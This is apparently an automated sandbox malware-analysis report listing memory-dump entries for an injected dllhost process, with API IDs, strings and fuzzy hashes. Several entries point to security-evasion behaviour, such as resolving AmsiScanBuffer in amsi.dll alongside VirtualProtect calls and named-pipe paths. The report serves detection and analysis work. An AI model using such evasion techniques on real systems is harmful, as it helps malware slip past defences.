                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: 3d646bb622f1b65c555b98d963c83bc91fd4aa67e01f566f7d99af59e472c7fe
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: 2351CB3520BB459EEF05DF29EC9869433A1FB04764F860825ED2D167A6EF78C598C341
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: eed914dc639f07539974a1c5cb33d1459f43a64bfae543a0dee5be96f78adebc
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: A851EE3620BB459DEF05DF14E8D969833A1FB04765F860825AD2D07BA6EF78CA98C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: 8697c04afa3e428bede2d753a602efcc3cfbc87b7fe3acccd28374828fdd0098
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: 5B31922270BB518BEB29DF16F54876963A0FB44BA4F0A8020CF4C27B55EF38C4E18704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: 3effccf53b3f8fe5cade01ff4c028225a889997388ec41c9b3f9a532a0c49e9f
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: 92318E2270AB518FEB69DF16E58876963A0FB44FA4F0A8020DF4D07B55EF38D4E18704
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: f658ca13e646096a9d18bef38774ec5ddeaf282909ecb85c257f6c514dfbdd46
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: BD11862530F7508AFB54AB71681D3BE3251BBC57B0F964624AC6E767CACE38D4C18300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: ace980ef25080d505fc04628aa9cd0b1a19ff0e19314daf801a2f8bf60c4b403
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: C611542631F3514EFB54A732681D3BE2191BBC57B0F964624AC6E56FDADE28C8C18300
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: ecf444d445257eaba96855e57a1db3d642f8831c28f7a9a0e8c4e79102e02a8e
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: F001292571AB408AEB14DF12A89875963A1FB88FE0F8980759E9D43795EE3CC985C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: 1040e325c2543e98eb1e65ee772f935458091240106824406a398b84e819ad8b
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: 60016D2570AB408AEB50DB12A89C75963E1F78CFE0F4940349E8E47B55DE3CC9C5C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: 9ca58b2f5a5d50ddf5c0c018dbcaf6995bb4866b09242242e985dd050f6a6aa6
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: BB01406921BB408AFB249F26F88CB1573A0BF59B65F054024CD4D16765EF3DC4C8C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: 63ab2b3c58fc2eef87633db1c618660823861a87764befb47eefdc0623a80a97
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: 7F01406961BB408AFB649B25F88C71573E0BF59B65F050424DE4E0A7A5EF3DC5D8C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: f152cea283674a87619d4040ed76564c551190e95ced888b0c93fabd2a09b3f1
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: 4DF062623197859AEB208F21F5CC7596361F784BA8FC59071DE4D46955EF7CC6C8CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: 1a5433768c75a611c323c02f44aa59f9fec194420ba5c2f5315806f595a9fd7c
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: 47F0AF223097849AEB608B20F8CC75963A0F784BA8F858021CE4E46A54DE7CC6C8CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: addf4d0b1db663fa9274f214804e69731fa87a5a48a7b25dfd0c1b1dc081baf0
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: D8F03A6521BB4189FF248B24A8997796360FB897B0F964619DE7E4A5E8CF3CC4C8C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: 6340827b4e17e5010663d386bbe62111d39e6c6662646d18c5087f83cbc619dd
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: 89F08C69709B9086EB149F13B918119A260BB48FE1F4AC070EE0E17B18DF2CC4858700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: 7b20e5072ecc76eb2cff13324b271b5b52a1c013dd6addca401b113f6c26aa28
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: 51F0306621B70189EF149B24A89D76963A0FB89770F950719DE7F495E4CF3CC4C8C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: 428ade637915c0970fd288fc6add3ff18808db579b56f2ad2e23f7f0871e47c8
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: 28F08C69709B8086EB549B13BD1C119A2A0BB48FE0F4A8030EE4F0BB18DE3CC4C58700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 713c524e57f6de6d7974cf58e2f32d6abe6c6834f583fa15143c44a805f97be8
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: 6CD0671562B700DEEB09AF11FC9C7543261BFA8B21FC68465CD0E112A1EF2C85D99340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 618579bfee8315ac86624bd30c6a5e58d742de73df773eaa353e62bea960c29e
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: DCD09E1562F700DDFB49AB15EC9C75432A1BFA8B31FC64825CD1F096A1DE3C85D98340
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: f332c4a0b912405e95993bfbddc4ed58c72e9c92c3b1ca4c70c05a4ccac639d6
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: DE02CB3621EB848AE7A0CB59F49475AF7A0F3C57A4F114015EA8E97BA8DF7CC494CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: 8b7b29ecfde653e2a4b10100ecc7a39fe1dfd968c6db7a705219b3f124198a02
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: 6202C67721EB848AEBA0CB55F49475EB7A1F3C47A4F114015EA8E87BA9DB7CC484CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true
                          • Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: c645ce8e3fd995234a99ba4f60b6d1649cff9f6893a5f56e32a63772d950a048
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: CF51D73531A7018FE364DF1AF488A5A73A4F788BA4F524129DD4E53B55DF38C885CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true
                          • Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
